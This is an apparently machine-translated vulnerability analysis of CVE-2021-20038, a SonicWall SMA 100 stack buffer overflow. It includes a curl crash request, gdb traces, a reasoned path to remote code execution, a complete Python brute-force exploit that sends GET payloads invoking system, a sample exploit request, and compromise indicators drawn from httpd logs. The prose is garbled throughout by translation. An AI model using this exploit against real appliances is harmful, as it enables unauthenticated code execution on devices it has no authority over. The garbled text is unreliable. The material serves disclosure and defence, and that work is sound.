当前位置:网站首页>CVE-2021-20038

CVE-2021-20038

2022-06-23 06:18:00 Khan security team

describe

2021 year 12 month 7 Japan ,SonicWall Secure mobile access for (SMA) 100 Series releases new firmware .SonicWall On 2022 year 1 month 11 Safety announcement issued on May , Inform the user of 12 Month issued Rapid7 Fixed security issues found . The key question is Web Unauthenticated stack based buffer overflow in interface , Allows remote attackers to nobody Execute arbitrary code as user . The vulnerability number is CVE-2021-20038,CVSS The score is 9.8.

Here it is AttackerKB Before release , There is no open proof of concept exploit . however , This entry contains proof of concept exploits and an extended discussion about making payloads for unauthenticated remote code execution . It is not clear whether this problem has been exploited in the wild .

Affected products

SMA 100 The following firmware versions of the series are affected :

  • 10.2.1.2-24sv And earlier
  • 10.2.1.1-19sv And earlier
  • 10.2.1.0-17v And earlier

9.x or 10.2.0.x Versions are not affected .

Rapid7 analysis

Please note that , The offsets and addresses discussed in this analysis are from SMA 10.2.1.1-19sv, They may vary slightly between versions .

CVE-2021-20038 It happened in httpd Stack based buffer overflow in binary file .SonicWall SMA 100 Series use Apache HTTP A modified version of the server .SonicWall A modification of the introduces this vulnerability . The problem is how the environment variables are mod_cgi.so. Because the attacker provided QUERY_STRING Not subject to any type of length check , Attackers can get through strcat.

Too long QUERY_STRING It will also cause future boundary checks on the buffer to fail due to integer overflows , This leads to a series of strcat The call goes further beyond the bounds of the stack based buffer .

following curl The command demonstrates how to make HTTP Server crash :

[email protected]:~$ curl --insecure "https://10.0.0.7/?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
curl: (52) Empty reply from server

from gdb The final strcat Call to see , As shown below . Please note that , Vulnerable buffers from 0xbfb6ae42 Start , And should be limited to 400 byte .

Breakpoint 1, 0xb69a88c3 in ?? () from /lib/mod_cgi.so
(gdb) disas 0xb69a88c3,0xb69a88c8
Dump of assembler code from 0xb69a88c3 to 0xb69a88c8:
=> 0xb69a88c3:  call   0xb69a6a0c <[email protected]>
End of assembler dump.
(gdb) x/2wx $esp            	 
0xbfb6acc0: 	0xbfb6ae42  	0x0969e9a8
(gdb) printf "%s\n", 0xbfb6ae42  
10.0.0.9 QUERY_STRING=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA WAF_NOT_LICENSED=1SCRIPT_URL=/SCRIPT_URI=https://10.0.0.7/HTTPS=onHTTP_HOST=10.0.0.7HTTP_USER_AGENT=curl/7.74.0HTTP_ACCEPT=*/*SERVER_SIGNATURE=SERVER_SOFTWARE=SonicWALL SSL-VPN Web ServerSERVER_NAME=10.0.0.7SERVER_ADDR=10.0.0.7SERVER_PORT=443REMOTE_ADDR=10.0.0.9DOCUMENT_ROOT=/usr/src/EasyAccess/www/htdocsREQUEST_SCHEME=httpsCONTEXT_PREFIX=CONTEXT_DOCUMENT_ROOT=/usr/src/EasyAccess/www/[email protected]_FILENAME=/usr/src/EasyAccess/www/cgi-bin/staticContentREMOTE_PORT=42326GATEWAY_INTERFACE=CGI/1.1SERVER_PROTOCOL=HTTP/1.1REQUEST_METHOD=GET
(gdb) printf "%s\n", 0x0969e9a8  
REQUEST_URI=/?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
(gdb)

Overflow causes a crash due to invalid memory access .

Program received signal SIGSEGV, Segmentation fault.
0xb69a8fe9 in ?? () from /lib/mod_cgi.so
(gdb) disas 0xb69a8fe6,0xb69a8ff9
Dump of assembler code from 0xb69a8fe6 to 0xb69a8ff9:
   0xb69a8fe6:  mov	0x8(%ebp),%eax
=> 0xb69a8fe9:  mov	0x110(%eax),%eax
   0xb69a8fef:  movl   $0x2000,0x10(%esp)
   0xb69a8ff7:  movl   $0x0,0x14(%esp)
End of assembler dump.
(gdb) print $eax
$1 = 1094795585
(gdb) x/1wx $eax            	 
0x41414141: 	Cannot access memory at address 0x41414141
(gdb) bt
#0  0xb69a8fe9 in ?? () from /lib/mod_cgi.so
#1  0x41413f2f in ?? ()
#2  0x41414141 in ?? ()
#3  0x41414141 in ?? ()
#4  0x41414141 in ?? ()
#5  0x41414141 in ?? ()
#6  0x41414141 in ?? ()

Above GDB Output in progress , You can see mod_cgi.so Attempt to dereference has been stored in The pointer to $ebp+8, But it got an invalid address 0x41414141or AAAA. This is where we are curl Sent in a message “ Payload ” Part of . in fact , Let's review $ebp-982 The entire environment array of the overflow buffer :

(gdb) printf "%s\n", $ebp-982
10.0.0.9 QUERY_STRING=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA WAF_NOT_LICENSED=1SCRIPT_URL=/SCRIPT_URI=https://10.0.0.7/HTTPS=onHTTP_HOST=10.0.0.7HTTP_USER_AGENT=curl/7.74.0HTTP_ACCEPT=*/*SERVER_SIGNATURE=SERVER_SOFTWARE=SonicWALL SSL-VPN Web ServerSERVER_NAME=10.0.0.7SERVER_ADDR=10.0.0.7SERVER_PORT=443REMOTE_ADDR=10.0.0.9DOCUMENT_ROOT=/usr/src/EasyAccess/www/htdocsREQUEST_SCHEME=httpsCONTEXT_PREFIX=CONTEXT_DOCUMENT_ROOT=/usr/src/EasyAccess/www/[email protected]pnSCRIPT_FILENAME=/usr/src/EasyAccess/www/cgi-bin/staticContentREMOTE_PORT=42326GATEWAY_INTERFACE=CGI/1.1SERVER_PROTOCOL=HTTP/1.1REQUEST_METHOD=GETREQUEST_URI=/?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASCRIPT_NAME=/index.html

mod_cgi.so Attempting to load *(*($ebp+8)+0x110), To pass it as the first argument to ap_get_brigade

ap_get_brigade It's a common Apache httpd function , So we can easily find the source code :

AP_DECLARE(apr_status_t) ap_get_brigade(ap_filter_t *next,
                                        apr_bucket_brigade *bb,
                                        ap_input_mode_t mode,
                                        apr_read_type_e block,
                                        apr_off_t readbytes)
{
    if (next) {
        return next->frec->filter_func.in_func(next, bb, mode, block,
                                               readbytes);
    }
    return AP_NOBODY_READ;
}

The parameter we override with buffer overflow is the first parameter :ap_filter_t* next. If the pointer is not null , The pointer is used to call the function stored in memory . Theoretically , Because the attacker rewrites this pointer , They can control the function being called , This results in unauthenticated remote code execution .

To write RCE Exploit

Under normal circumstances , Usually by using ret Return to the address chosen by the attacker to exploit a stack based buffer overflow like this . However , Because of the way logic flows mod_cgi.so, The attacker can't be in ret Controllable without first encountering a series of inevitable potential memory access violations . therefore , The most feasible use of vectors is through control function calls ap_get_brigade.

Before we talk about writing exploits , We need to understand the vulnerability mitigation measures deployed on the system , especially httpd How are they affected .

[email protected]:~ # cat /proc/sys/kernel/randomize_va_space                                                                                                                                               
2

ad locum , We can see SonicWall SMA 100 The series supports all Address space layout randomization (ASLR), This means that we should expect the stack 、 Pile up 、 Both the library and the main executable are loaded to random addresses .

However , There are some things httpd Will weaken ASLR. The first is the main executable ,httpd Not compiled as a location independent executable , So it Can't Load with random base address . It will be 0x8048000 It can be foreseen every time you load .

[email protected]:~ # cat /proc/                                                                                                                                                                  	 
26775 /maps 08048000-080e0000 r-xp 00000000 01:00 100949  	/usr/src/EasyAccess/bin/httpd
080e0000-080e3000 rw-p 00098000 01:00 100949  	/usr/src/EasyAccess/bin/httpd
080e3000-080e6000 rw-p 00000000 00:00 0

Besides ,httpd Server usage Apache Of prefork characteristic .

[email protected]:~ # /usr/src/EasyAccess/bin/httpd -l                                                                                                                                                     	 
Compiled in modules:
  core.c
  mod_so.c
  http_core.c
  prefork.c

It means httpd Bifurcation A series of subprocesses are created to handle the incoming HTTP request . It's important , Because the forked child process has the same as the parent process Identical memory layout . This means that all child processes will have exactly the same stack as the parent process 、 Heap and library addresses . and , Perhaps it is also worth noting that , When a child process crashes , Lord httpd The executable simply spawns a new one to replace it . This gives the attacker the opportunity to guess the valid address .

Develop and utilize ap_get_brigade Some challenges overflow from us , It requires three dereferences and a nice specific memory layout to control function calls . We did write a small program to look for such gadgets , And finally found some, but they couldn't be used ( for example , It just led to new frustrating memory access violations ).

If there are no existing gadgets , We need to introduce the required patterns into the system by ourselves . This means getting the schema in the heap or stack , And guess its location correctly . For heap space httpd It's actually quite large , The attacker can get a usable mode into the heap memory , forecast ,uClibc Possible addresses for Of malloc It's not something we want to assume ( Although it is likely to be feasible ) The practice of . This forced me to bring available patterns onto the stack .

Using the stack in this case has several benefits . The first is , because httpd It's a 32 Bit of executable , The top address of the stack is only 11 The randomness of bits is applied to it .

byte 1

byte 2

byte 3

byte 4

0xbf

The highest bit is always set

Lowest page alignment 4 Bit is always 0

Page alignment ( also called 0)

This means that we know that the top address of the stack will always be 0xbf800000 To 0xbffff000 Within the scope of . This reduces the potential stack top address to 2047 A possibility . Of course , Then we need to guess the actual $ebp+8 The covered address can realize our vulnerability exploitation . however , We know that this will be close to the top of the range . If we naively brutally crack for each top address 0x2000 Address range , Then we should be 1600 m HTTP Successfully guessed the correct address in the request .

1600 There are so many requirements ! Is, indeed, . But remember , This is just a naive method , May be need Its landing has been greatly improved . We're just sure it's possible . But we can still reduce it a little . We know that our destination address will always be the same as 0. This reduces the number of requests required to 100 m HTTP request .

Savvy readers and experienced exploit developers may point out , We can further reduce the number of requests by repeating exploits over and over in the payload . That's a good idea ! Unfortunately , We must deal with factors that limit our ability to reuse :

  1. QUERY_STRING Didn't get url decode , So we can't ( reasonably ) Use the biggest part of exploit to actually …… utilize .
  2. The requested page did get URL decode , But in size and decoding %00 There are limitations .
  3. Stack based buffer overflows occur very close to the top of the stack , So much more than 1700 Bytes may be exploited by accessing the top address +1 Or simply override the global variables we might need later ( for example env[ ] Invocation time system).
  4. A bunch of boring 、 Useless or duplicate environment variables are beyond our control , Occupy 1700 Most of the bytes .

In view of these limitations , We wrote a vulnerability exploiter , Try to send all about 100 m HTTP GET Request to brute force the available address . Again, it needs to be emphasized that , This can greatly improve , The following is only for “ It's possible ” Type of things .

import socket
import ssl
import time

base = 0xbf800000
curr = base
step = 0x1000
base_array = []
while curr != 0xbffff000:
	base_array.append(curr)
	curr += step

print("Generated " + hex(len(base_array)) + " stack top addr")

all_array = []
for base in base_array:
	search_start = base - 0x2800
	search_end = base - 0x0800
	curr = search_start
	while curr != search_end:
    	curr += 0x10
    	all_array.append(curr)

print("Generated " + hex(len(all_array)) + " search addresses")

print("Sending sploits...")
for address in all_array:
	print(hex(address), end='\r')
	address -= 0x110
	address += 4
	# transform bytes into url encoded
	one = (address >> 24) & 0x000000ff
	two = (address >> 16) & 0x000000ff
	three = (address >> 8) & 0x000000ff
	four = (address & 0x000000ff)

	if one == 0 or two == 0 or three == 0 or four == 0:
    	# the server won't accept a null byte
    	continue

	addr_one = b"%" + str.encode('{:02x}'.format(four, 'x')) + b"%" + str.encode('{:02x}'.format(three, 'x')) + b"%" + str.encode('{:02x}'.format(two, 'x')) + b"%" + str.encode('{:02x}'.format(one, 'x'))

	address += 0x110
	address += 4

	# transform bytes into url encoded
	one = (address >> 24) & 0x000000ff
	two = (address >> 16) & 0x000000ff
	three = (address >> 8) & 0x000000ff
	four = (address & 0x000000ff)
    
	if one == 0x28 or two == 0x28 or three == 0x28 or four == 0x28:
    	# oh no the guy that wrote this is a hack! Should have
    	# shifted the payload so meta characters wouldn't matter.
    	# oh well :(
    	continue

	addr_two = b"%" + str.encode('{:02x}'.format(four, 'x')) + b"%" + str.encode('{:02x}'.format(three, 'x')) + b"%" + str.encode('{:02x}'.format(two, 'x')) + b"%" + str.encode('{:02x}'.format(one, 'x'))
	system_addr = b"%64%b8%06%08"
	shell_cmd = b";{touch,/tmp/lol};"

	#payload = ((b"%94%d7%ba%bf") + (b"%a8%d8%ba%bf") + (b"%a8%d8%ba%bf") + (b"%64%b8%06%08") + b";{touch,/tmp/lol};")*2
	exploit = addr_one + addr_two + addr_two + system_addr + shell_cmd

	payload = exploit*2
	spray_pray = b"/" + payload + b"?" + (b'z'*518)
	request = b'GET ' + spray_pray + b'\r\n\r\n'

	sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	wrappedSocket = ssl.wrap_socket(sock)

	wrappedSocket.connect(("10.0.0.7", 443))
	wrappedSocket.send(request)
	wrappedSocket.recv(1280)
	wrappedSocket.close()

The most interesting part of this exploit is generating GET request . for example , about HTTP For the server , It looks something like this :

GET /%04%d7%7f%bf%18%d8%7f%bf%18%d8%7f%bf%64%b8%06%08;{touch,/tmp/lol};%04%d7%7f %BF%18%D8%7F%BF%18%D8%7F%BF%64%B8%06%08; { touch ,/ TMP / Lol } ;? zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz

Exploit payload ( Repeat twice , Although exploits do not exploit this ) Is four addresses and a string to be passed to the system :

  1. 0xbf7fd704
  2. 0xbf7fd818
  3. 0xbf7fd818
  4. 0x0806b864
  5. ;{ touch ,/tmp/lol};

First address , When adding 0x110 And dereference , Will resolve to the second address . When dereferencing , The second address points to the third address , The third address plus four points to the fourth address , This will resolve to system. String passed to system from 0xbf7d818 Start , So in /bin/sh There are some bad characters before arriving touch /tmp/lol.

The stack address at the top is 0xbfb6c000 Test exploit on the target of , stay 4 Hours 43 Minutes later .

[email protected]:~ #  date 
Thu Nov 25 03:29:39 PST 2021 
[email protected]:~ # ls -l /tmp/lol 
ls:  cannot access  /tmp/lol:  There is no such file or directory 
[email protected]:~ # ls -l /tmp/lol 
-rw-r--r-- 1 No one, no one 0 Nov 25 08:05 /tmp/lol

As you can see , The attacker gains execution as nobody.

The above exploits are not good , There are many reasons . Some are as follows :

  1. You can use the repeating pattern to guess a HTTP Multiple addresses in the request .
  2. A smaller scanning range can be used (0x800 – 0x2800 Is a very large range ).
  3. If the address 3 Contains incorrect shell character ( for example (), The exploit will be interrupted .

This exploit does not consider possible alignment problems due to the following reasons :

  1. The host name used by the target is not sslvpn.
  2. No 8 Byte long target IP And host IP.
  3. No 3 Byte long target port
  4. No 5 Byte long source port .

For all that , This alone indicates , Even in the face of challenges , This problem can be used absolutely , It should be repaired as soon as possible . We have also solved some of these problems in more mature vulnerability exploitation , It contains information that you can use in GitHub Weaponized payloads found on .

Compromise indicators

attack , Especially what it says , Quite noisy . The best place to look for compromise indicators is httpd.log. This can be done by Web Interface search : System -> The diagnosis -> Technical support report -> Download the report . The httpd.log The file will be zip On file . The recorded segmentation error is a sign of potential hazard . This is my system httpd.log A fragment after being used :

[Thu Nov 25 13:30:11.805181 2021] [core:notice] [pid 1779] AH00052: child pid 30485 exit signal Segmentation fault (11)
[Thu Nov 25 13:30:11.805375 2021] [core:notice] [pid 1779] AH00052: child pid 30486 exit signal Segmentation fault (11)
[Thu Nov 25 13:30:11.805571 2021] [core:notice] [pid 1779] AH00052: child pid 30487 exit signal Segmentation fault (11)
[Thu Nov 25 13:30:11.805765 2021] [core:notice] [pid 1779] AH00052: child pid 30488 exit signal Segmentation fault (11)
[Thu Nov 25 13:30:11.843348 2021] [core:notice] [pid 1779] AH00052: child pid 30489 exit signal Segmentation fault (11)
[Thu Nov 25 13:30:11.843583 2021] [core:notice] [pid 1779] AH00052: child pid 30490 exit signal Segmentation fault (11)
[Thu Nov 25 13:30:11.843785 2021] [core:notice] [pid 1779] AH00052: child pid 30491 exit signal Segmentation fault (11)
[Thu Nov 25 13:30:11.843983 2021] [core:notice] [pid 1779] AH00052: child pid 30492 exit signal Segmentation fault (11)
[Thu Nov 25 13:30:11.844214 2021] [core:notice] [pid 1779] AH00052: child pid 30493 exit signal Segmentation fault (11)

actually , An attacker can delete this log file shortly after exploiting the system , But it's worth catching an attacker who tries to exploit and doesn't clean himself up properly .

The status.txt Logs may also be of interest . say concretely , It shows ps Displays all output from all running processes . Unfortunately , To view this log, you need to be familiar with what should and should not be running on the system , It is difficult for laymen to know . View this output on my system , We can easily identify gdb and busybox As exception .

Processes
-----------------------------------------------------------------
USER   	PID %CPU %MEM	VSZ   RSS TTY  	STAT START   TIME COMMAND
root     	1  0.0  0.0   2068   584 ?    	Ss   Nov27   0:42 init [3]  
root     	2  0.0  0.0  	0 	0 ?    	S	Nov27   0:00 [kthreadd]
root     	3  0.0  0.0  	0 	0 ?    	S	Nov27   0:00 [ksoftirqd/0]
root     	4  0.0  0.0  	0 	0 ?    	S	Nov27   0:00 [kworker/0:0]
root     	5  0.0  0.0  	0 	0 ?    	S<   Nov27   0:00 [kworker/0:0H]
root     	6  0.0  0.0  	0 	0 ?    	S	Nov27   0:00 [kworker/u4:0]
root     	7  0.0  0.0  	0 	0 ?    	S	Nov27   2:12 [rcu_sched]
root     	8  0.0  0.0  	0 	0 ?    	S	Nov27   0:00 [rcu_bh]
root     	9  0.0  0.0  	0 	0 ?    	S	Nov27   0:06 [migration/0]
root    	10  0.0  0.0  	0 	0 ?    	S	Nov27   0:15 [migration/1]
root    	11  0.0  0.0  	0 	0 ?    	S	Nov27   0:01 [ksoftirqd/1]
root    	13  0.0  0.0  	0 	0 ?    	S<   Nov27   0:00 [kworker/1:0H]
root    	14  0.0  0.0  	0 	0 ?    	S<   Nov27   0:00 [khelper]
root    	15  0.0  0.0  	0 	0 ?    	S<   Nov27   0:00 [netns]
root   	461  0.0  0.0  	0 	0 ?    	S<   Nov27   0:00 [writeback]
root   	463  0.0  0.0  	0 	0 ?    	S<   Nov27   0:00 [bioset]
root   	465  0.0  0.0  	0 	0 ?    	S<   Nov27   0:00 [kblockd]
root   	622  0.0  0.0  	0 	0 ?    	S<   Nov27   0:00 [ata_sff]
root   	632  0.0  0.0  	0 	0 ?    	S	Nov27   0:00 [khubd]
root   	742  0.0  0.0  	0 	0 ?    	S	Nov27   0:01 [kworker/0:1]
root   	757  0.0  0.0  	0 	0 ?    	S	Nov27   0:00 [kswapd0]
root   	758  0.0  0.0  	0 	0 ?    	SN   Nov27   0:00 [ksmd]
root   	825  0.0  0.0  	0 	0 ?    	SN   Nov27   0:00 [khugepaged]
root   	826  0.0  0.0  	0 	0 ?    	S	Nov27   0:00 [fsnotify_mark]
root   	845  0.0  0.0  	0 	0 ?    	S<   Nov27   0:00 [crypto]
root  	1011  0.0  0.0  	0 	0 ?    	S	Nov27   0:01 [kworker/1:1]
root  	1061  0.0  0.0  	0 	0 ?    	S<   Nov27   0:00 [iscsi_eh]
root  	1065  0.0  0.0  	0 	0 ?    	S<   Nov27   0:00 [kworker/0:1H]
root  	1069  0.0  0.0  	0 	0 ?    	S<   Nov27   0:00 [fc_exch_workque]
root  	1070  0.0  0.0  	0 	0 ?    	S<   Nov27   0:00 [fc_rport_eq]
root  	1071  0.0  0.0  	0 	0 ?    	S<   Nov27   0:00 [fcoethread/0]
root  	1072  0.0  0.0  	0 	0 ?    	S<   Nov27   0:00 [fcoethread/1]
root  	1075  0.0  0.0  	0 	0 ?    	S<   Nov27   0:00 [fnic_event_wq]
root  	1076  0.0  0.0  	0 	0 ?    	S<   Nov27   0:00 [fnic_fip_q]
root  	1078  0.0  0.0  	0 	0 ?    	S<   Nov27   0:00 [bnx2fc_l2_threa]
root  	1079  0.0  0.0  	0 	0 ?    	S<   Nov27   0:00 [bnx2fc_thread/0]
root  	1080  0.0  0.0  	0 	0 ?    	S<   Nov27   0:00 [bnx2fc_thread/1]
root  	1107  0.0  0.0  	0 	0 ?    	S	Nov27   0:00 [scsi_eh_0]
root  	1149  0.0  0.0  	0 	0 ?    	S<   Nov27   0:00 [bnx2i_thread/0]
root  	1150  0.0  0.0  	0 	0 ?    	S<   Nov27   0:00 [bnx2i_thread/1]
root  	1197  0.0  0.0  	0 	0 ?    	S<   Nov27   0:00 [bond0]
root  	1244  0.0  0.0  	0 	0 ?    	S<   Nov27   0:00 [cnic_wq]
root  	1246  0.0  0.0  	0 	0 ?    	S<   Nov27   0:00 [cxgb4]
root  	1257  0.0  0.0  	0 	0 ?    	S	Nov27   0:00 [kworker/1:2]
root  	1308  0.0  0.0  	0 	0 ?    	S<   Nov27   0:00 [deferwq]
root  	1322  0.0  0.0  	0 	0 ?    	S	Nov27   0:00 [kjournald]
root  	1328  0.0  0.0  	0 	0 ?    	S<   Nov27   0:00 [loop0]
root  	1407  0.0  0.0  13752  2744 ?    	Sl   Nov27   1:45 /usr/sbin/vmtoolsd
root  	1408  0.0  0.0  	0 	0 ?    	S<   Nov27   0:00 [kworker/1:1H]
root  	1435  0.0  0.0   2376   588 ?    	Ss   Nov27   0:00 /usr/sbin/fcron
root  	1447  0.0  0.4  19712 16996 pts/1	S+   03:51   0:00 ./gdb -p 30092
root  	1483  0.0  1.4  93152 59728 ?    	Sl   Nov27   0:55 /usr/bin/python3.6 /usr/src/EasyAccess/www/python/authentication_api/restful_api.py
nobody	1526  0.0  0.0  	0 	0 ?    	Z	03:52   0:00 [staticContent] <defunct>
root  	1551  0.0  0.2  20720 11124 ?    	Ss   Nov27   1:42 /usr/src/EasyAccess/bin/smm -d
root  	1627  0.0  0.0   1904   224 ?    	Ss   Nov27   0:00 /usr/sbin/ntpUpdate -d -i 3600 -p time.nist.gov -s time.windows.com
root  	1634  0.0  0.0   2120   596 ?    	Ss   Nov27   0:00 /usr/sbin/syslogd -m 0
root  	1639  0.0  0.0   3136  1684 ?    	Ss   Nov27   0:00 /usr/sbin/klogd -c 1
root  	1712  0.0  0.0  13208  1980 ?    	Ss   Nov27   0:00 /usr/sbin/crlUpdate -d -i 1440
root  	1719  0.0  0.0  13828  1968 ?    	Ss   Nov27   0:03 htcacheclean -nti -d60 -l5M -p/var/webcache
root  	1735  0.0  0.0  13164  1740 ?    	Ss   Nov27   0:00 /usr/src/EasyAccess/bin/anonySessionD
root  	1737  0.0  0.0  13164  1492 ?    	S	Nov27   0:00 /usr/src/EasyAccess/bin/anonySessionD
root  	1740  0.0  0.0  14320  3484 ?    	Ss   Nov27   0:00 /usr/src/EasyAccess/bin/firebase -d
root  	1748  0.0  0.3  45472 15316 ?    	Sl   Nov27   0:00 /usr/bin/node /usr/src/EasyAccess/bin/js/master.js
root  	1749  0.0  0.0   2080   268 ?    	S	Nov27   0:00 cat
root  	1752  0.0  0.3  45308 15408 ?    	Sl   Nov27   0:00 /usr/bin/node --debug-port=5859 /usr/src/EasyAccess/bin/js/ssoProxy.js
root  	1760  0.0  0.0  13616  2116 ?    	Ss   Nov27   0:00 /usr/src/EasyAccess/bin/wireguard -d
root  	1779  0.8  0.2  23468  8940 ?    	Ss   Nov27  21:47 /usr/src/EasyAccess/bin/httpd
root  	1805  0.0  0.0  13852  2556 ?    	Ss   Nov27   0:00 /usr/src/EasyAccess/bin/ftpsession -d
root  	1811  0.1  0.0  13916  3936 ?    	S<s  Nov27   2:51 /usr/src/EasyAccess/bin/graphd -d
root  	1820  0.0  0.0  13356  1816 ?    	Ss   Nov27   0:00 /usr/src/EasyAccess/bin/rootHelper -d
root  	1832  0.0  0.0  54412  2548 ?    	Ssl  Nov27   0:04 /usr/src/EasyAccess/bin/dhcpcd -d
root  	1851  0.0  0.1  15968  5260 ?    	Ss   Nov27   0:06 /usr/src/EasyAccess/bin/nxlog -d
root  	1867  0.0  0.0  13304  3152 ?    	S	Nov27   0:00 /usr/src/EasyAccess/bin/downloadclient -d
root  	1893  0.0  0.0  13204  2512 ?    	S	Nov27   0:00 /usr/sbin/LicenseManager
root  	1894  0.0  0.0  13200  2600 ?    	S	Nov27   0:00 /usr/sbin/PKGDownload
root  	1897  0.0  0.0  13772  3708 ?    	Ss   Nov27   0:16 /usr/src/EasyAccess/bin/HA -d
root  	1922  0.0  0.1  15224  5976 ?    	Ss   Nov27   0:00 /usr/sbin/updateAgent -d
root  	1923  0.0  0.0  13172  2556 ?    	S	Nov27   0:06 /usr/sbin/watchdog
root  	1924  0.0  0.1  13708  4948 ?    	S	Nov27   0:14 /usr/sbin/swMonitor
root  	2205  0.0  0.0  	0 	0 ?    	S	Nov28   0:00 [kworker/u4:2]
root  	2379  0.0  0.0   2048   432 tty1 	Ss+  Nov27   0:00 /sbin/mingetty tty1
root  	2380  0.0  0.0   2048   432 tty2 	Ss+  Nov27   0:00 /sbin/mingetty tty2
root  	4284  0.0  0.0   1136	64 ?    	Ss   Nov27   0:00 ./busybox telnetd
root  	4301  0.0  0.0   3564  1768 pts/0	Ss+  Nov27   0:00 -cli
root  	4346  0.0  0.0   3488  1752 pts/1	Ss   Nov27   0:00 -cli
nobody   18542  0.0  0.2  25772 12268 ?    	S	07:41   0:00 /usr/src/EasyAccess/bin/httpd
nobody   21363  0.0  0.7  44288 29776 ?    	S	08:19   0:01 /usr/src/EasyAccess/bin/httpd
nobody   24039  0.0  0.7  44344 30100 ?    	S	08:55   0:00 /usr/src/EasyAccess/bin/httpd
nobody   24259  0.0  0.7  44288 29776 ?    	S	08:58   0:01 /usr/src/EasyAccess/bin/httpd
nobody   27511  0.0  0.7  44340 30128 ?    	S	09:42   0:01 /usr/src/EasyAccess/bin/httpd
nobody   30092  0.0  0.2  25772 12200 ?    	t	03:01   0:00 /usr/src/EasyAccess/bin/httpd
nobody   30331  1.1  0.7  44284 29316 ?    	S	10:20   0:00 /usr/src/EasyAccess/bin/httpd
nobody   30382  0.0  0.2  25700 11904 ?    	S	10:20   0:00 /usr/src/EasyAccess/bin/httpd
nobody   30391  0.0  0.2  25568  8788 ?    	S	10:20   0:00 /usr/src/EasyAccess/bin/httpd
nobody   30392  0.0  0.2  25568  8788 ?    	S	10:20   0:00 /usr/src/EasyAccess/bin/httpd
nobody   30394  0.0  0.2  25568  8788 ?    	S	10:20   0:00 /usr/src/EasyAccess/bin/httpd
